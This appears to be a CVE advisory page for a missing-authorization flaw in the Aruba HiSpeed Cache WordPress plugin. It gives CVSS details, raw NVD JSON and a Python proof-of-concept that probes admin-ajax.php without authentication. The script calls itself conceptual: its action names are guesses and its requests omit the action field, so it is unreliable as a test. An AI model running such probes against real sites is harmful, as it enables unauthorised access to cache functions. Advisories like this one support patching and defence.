Security Vulnerability Report
中文
CVE-2025-67913 CVSS 6.5 MEDIUM

CVE-2025-67913

Published: 2026-01-08 10:15:50
Last Modified: 2026-04-27 18:16:48

Description

Missing Authorization vulnerability in Aruba.it Dev Aruba HiSpeed Cache aruba-hispeed-cache allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Aruba HiSpeed Cache: from n/a through < 3.0.3.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Aruba HiSpeed Cache < 3.0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-67913 PoC - Aruba HiSpeed Cache Missing Authorization # Target: WordPress site with Aruba HiSpeed Cache plugin < 3.0.3 # Note: This is a conceptual PoC based on the vulnerability description import requests import sys def check_vulnerability(target_url): """ Check if the target is vulnerable to CVE-2025-67913 Missing Authorization in Aruba HiSpeed Cache plugin """ # Common WordPress admin-ajax.php endpoint ajax_endpoint = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php" # Try to access functionality that should require authorization # Adjust the action parameter based on actual vulnerable endpoint vulnerable_endpoints = [ {"action": "ahsc_clear_cache", "data": {}}, {"action": "ahsc_purge_cache", "data": {}}, {"action": "ahsc_get_cache_status", "data": {}} ] for endpoint in vulnerable_endpoints: try: response = requests.post( ajax_endpoint, data=endpoint["data"], headers={"Content-Type": "application/x-www-form-urlencoded"}, timeout=10 ) # If we get a successful response without authentication, # the vulnerability may exist if response.status_code == 200: print(f"[+] Potential vulnerability found at: {endpoint['action']}") print(f"[+] Response: {response.text[:200]}") return True except requests.exceptions.RequestException as e: print(f"[-] Error testing {endpoint['action']}: {e}") print("[-] No obvious vulnerability detected (may require manual testing)") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-67913-poc.py <target_url>") print("Example: python cve-2025-67913-poc.py http://example.com") sys.exit(1) target = sys.argv[1] print(f"[*] Testing {target} for CVE-2025-67913") check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67913", "sourceIdentifier": "[email protected]", "published": "2026-01-08T10:15:50.093", "lastModified": "2026-04-27T18:16:48.200", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Aruba.it Dev Aruba HiSpeed Cache aruba-hispeed-cache allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Aruba HiSpeed Cache: from n/a through < 3.0.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/aruba-hispeed-cache/vulnerability/wordpress-aruba-hispeed-cache-plugin-3-0-3-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}